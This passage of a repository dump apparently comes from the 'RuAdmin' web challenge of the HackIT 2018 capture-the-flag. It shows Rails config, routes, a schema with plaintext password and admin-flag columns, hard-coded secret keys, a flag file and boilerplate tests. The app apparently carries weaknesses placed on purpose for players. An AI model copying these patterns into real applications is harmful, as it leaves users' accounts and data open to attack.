if you are using 36 | # clustered mode by specifying a number of `workers`. After each worker 37 | # process is booted this block will be run, if you are using `preload_app!` 38 | # option you will want to use this block to reconnect to any threads 39 | # or connections that may have been created at application boot, Ruby 40 | # cannot share connections between processes. 41 | # 42 | # on_worker_boot do 43 | # ActiveRecord::Base.establish_connection if defined?(ActiveRecord) 44 | # end 45 | 46 | # Allow puma to be restarted by `rails restart` command. 47 | plugin :tmp_restart 48 | -------------------------------------------------------------------------------- /web/RuAdmin/config/routes.rb: -------------------------------------------------------------------------------- 1 | Rails.application.routes.draw do 2 | resources :resumes, only: [:index, :new, :create, :destroy] 3 | get "/upload", to: "resumes#index" 4 | 5 | get '/', to: 'sessions#create', as: 'login' 6 | match '/admin', to: 'sessions#admin', via: :all 7 | get '/logout', to: 'sessions#destroy', as: 'logout' 8 | get '/home', to: 'home#index', as: 'home' 9 | resources :sessions 10 | # For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html 11 | end 12 | -------------------------------------------------------------------------------- /web/RuAdmin/config/secrets.yml: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Your secret key is used for verifying the integrity of signed cookies. 4 | # If you change this key, all old signed cookies will become invalid! 5 | 6 | # Make sure the secret is at least 30 characters and all random, 7 | # no regular words or you'll be exposed to dictionary attacks. 8 | # You can use `rails secret` to generate a secure secret key. 9 | 10 | # Make sure the secrets in this file are kept private 11 | # if you're sharing your code publicly. 12 | 13 | development: 14 | secret_key_base: 41b74af56fef2f474da3c1a39911e3ee64dae3d37804115e783e257a37b15aba62ec60d30eb52c35b3622997a742bedea8f2af85722003213138cf08a6296982 15 | 16 | test: 17 | secret_key_base: 93a9c36d61e924f5b0fa9015feba9c0953cbc75c5035cb5429271cd1ccad4d0b1789e4e5a5f17c61bc6c0eef9100e82fd0d0161a26dae03fa8ffba0b0ea3dc8c 18 | 19 | # Do not keep production secrets in the repository, 20 | # instead read values from the environment. 21 | production: 22 | secret_key_base: "AAADAJZEA1233'à))213312'adcc#:!,,:aeazaa" 23 | -------------------------------------------------------------------------------- /web/RuAdmin/config/spring.rb: -------------------------------------------------------------------------------- 1 | %w( 2 | .ruby-version 3 | .rbenv-vars 4 | tmp/restart.txt 5 | tmp/caching-dev.txt 6 | ).each { |path| Spring.watch(path) } 7 | -------------------------------------------------------------------------------- /web/RuAdmin/db/migrate/20180822104110_create_users.rb: -------------------------------------------------------------------------------- 1 | class CreateUsers < ActiveRecord::Migration[5.0] 2 | def change 3 | create_table :users do |t| 4 | t.string :username 5 | t.string :password_digest 6 | 7 | t.timestamps 8 | end 9 | end 10 | end 11 | -------------------------------------------------------------------------------- /web/RuAdmin/db/migrate/20180822113826_create_resumes.rb: -------------------------------------------------------------------------------- 1 | class CreateResumes < ActiveRecord::Migration[5.0] 2 | def change 3 | create_table :resumes do |t| 4 | t.string :name 5 | t.string :attachment 6 | 7 | t.timestamps 8 | end 9 | end 10 | end 11 | -------------------------------------------------------------------------------- /web/RuAdmin/db/schema.rb: -------------------------------------------------------------------------------- 1 | # This file is auto-generated from the current state of the database. Instead 2 | # of editing this file, please use the migrations feature of Active Record to 3 | # incrementally modify your database, and then regenerate this schema definition. 4 | # 5 | # Note that this schema.rb definition is the authoritative source for your 6 | # database schema. If you need to create the application database on another 7 | # system, you should be using db:schema:load, not running all the migrations 8 | # from scratch. The latter is a flawed and unsustainable approach (the more migrations 9 | # you'll amass, the slower it'll run and the greater likelihood for issues). 10 | # 11 | # It's strongly recommended that you check this file into your version control system. 12 | 13 | ActiveRecord::Schema.define(version: 20180822113826) do 14 | 15 | create_table "resumes", force: :cascade, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8" do |t| 16 | t.string "name" 17 | t.string "attachment" 18 | t.datetime "created_at", null: false 19 | t.datetime "updated_at", null: false 20 | end 21 | 22 | create_table "users", force: :cascade, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8" do |t| 23 | t.string "username" 24 | t.string "password" 25 | t.boolean "isadmin" 26 | end 27 | 28 | end 29 | -------------------------------------------------------------------------------- /web/RuAdmin/db/seeds.rb: -------------------------------------------------------------------------------- 1 | # This file should contain all the record creation needed to seed the database with its default values. 2 | # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup). 3 | # 4 | # Examples: 5 | # 6 | # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }]) 7 | # Character.create(name: 'Luke', movie: movies.first) 8 | -------------------------------------------------------------------------------- /web/RuAdmin/fl4g_is_h3re/flag.txt: -------------------------------------------------------------------------------- 1 | flag{ you found the fl4g gratz } 2 | -------------------------------------------------------------------------------- /web/RuAdmin/lib/assets/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/lib/assets/.keep -------------------------------------------------------------------------------- /web/RuAdmin/lib/tasks/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/lib/tasks/.keep -------------------------------------------------------------------------------- /web/RuAdmin/log/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/log/.keep -------------------------------------------------------------------------------- /web/RuAdmin/public/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The page you were looking for doesn't exist (404) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The page you were looking for doesn't exist.

62 |

You may have mistyped the address or the page may have moved.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /web/RuAdmin/public/422.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The change you wanted was rejected (422) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The change you wanted was rejected.

62 |

Maybe you tried to change something you didn't have access to.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /web/RuAdmin/public/500.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | We're sorry, but something went wrong (500) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

We're sorry, but something went wrong.

62 |
63 |

If you are the application owner check the logs for more information.

64 |
65 | 66 | 67 | -------------------------------------------------------------------------------- /web/RuAdmin/public/apple-touch-icon-precomposed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/apple-touch-icon-precomposed.png -------------------------------------------------------------------------------- /web/RuAdmin/public/apple-touch-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/apple-touch-icon.png -------------------------------------------------------------------------------- /web/RuAdmin/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/favicon.ico -------------------------------------------------------------------------------- /web/RuAdmin/public/public/uploads/resumes/hax.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/public/public/uploads/resumes/hax.c -------------------------------------------------------------------------------- /web/RuAdmin/public/robots.txt: -------------------------------------------------------------------------------- 1 | # See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file 2 | # 3 | # To ban all spiders from the entire site uncomment the next two lines: 4 | # User-agent: * 5 | # Disallow: / 6 | -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/controllers/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/resumes_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class ResumesControllerTest < ActionDispatch::IntegrationTest 4 | test "should get index" do 5 | get resumes_index_url 6 | assert_response :success 7 | end 8 | 9 | test "should get new" do 10 | get resumes_new_url 11 | assert_response :success 12 | end 13 | 14 | test "should get create" do 15 | get resumes_create_url 16 | assert_response :success 17 | end 18 | 19 | test "should get destroy" do 20 | get resumes_destroy_url 21 | assert_response :success 22 | end 23 | 24 | end 25 | -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/sessions_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class SessionsControllerTest < ActionDispatch::IntegrationTest 4 | test "should get new" do 5 | get sessions_new_url 6 | assert_response :success 7 | end 8 | 9 | end 10 | -------------------------------------------------------------------------------- /web/RuAdmin/test/controllers/users_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class UsersControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/fixtures/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/files/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/fixtures/files/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/resumes.yml: -------------------------------------------------------------------------------- 1 | # Read about fixtures at http://api.rubyonrails.org/classes/ActiveRecord/FixtureSet.html 2 | 3 | one: 4 | name: MyString 5 | attachment: MyString 6 | 7 | two: 8 | name: MyString 9 | attachment: MyString 10 | -------------------------------------------------------------------------------- /web/RuAdmin/test/fixtures/users.yml: -------------------------------------------------------------------------------- 1 | # Read about fixtures at http://api.rubyonrails.org/classes/ActiveRecord/FixtureSet.html 2 | 3 | one: 4 | username: MyString 5 | password_digest: MyString 6 | 7 | two: 8 | username: MyString 9 | password_digest: MyString 10 | -------------------------------------------------------------------------------- /web/RuAdmin/test/helpers/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/helpers/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/integration/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/integration/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/mailers/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/mailers/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/models/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/test/models/.keep -------------------------------------------------------------------------------- /web/RuAdmin/test/models/resume_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class ResumeTest < ActiveSupport::TestCase 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /web/RuAdmin/test/models/user_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class UserTest < ActiveSupport::TestCase 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /web/RuAdmin/test/test_helper.rb: -------------------------------------------------------------------------------- 1 | ENV['RAILS_ENV'] ||= 'test' 2 | require File.expand_path('../../config/environment', __FILE__) 3 | require 'rails/test_help' 4 | 5 | class ActiveSupport::TestCase 6 | # Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order. 7 | fixtures :all 8 | 9 | # Add more helper methods to be used by all tests here... 10 | end 11 | -------------------------------------------------------------------------------- /web/RuAdmin/tmp/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/tmp/.keep -------------------------------------------------------------------------------- /web/RuAdmin/vendor/assets/javascripts/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/vendor/assets/javascripts/.keep -------------------------------------------------------------------------------- /web/RuAdmin/vendor/assets/stylesheets/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/vendor/assets/stylesheets/.keep --------------------------------------------------------------------------------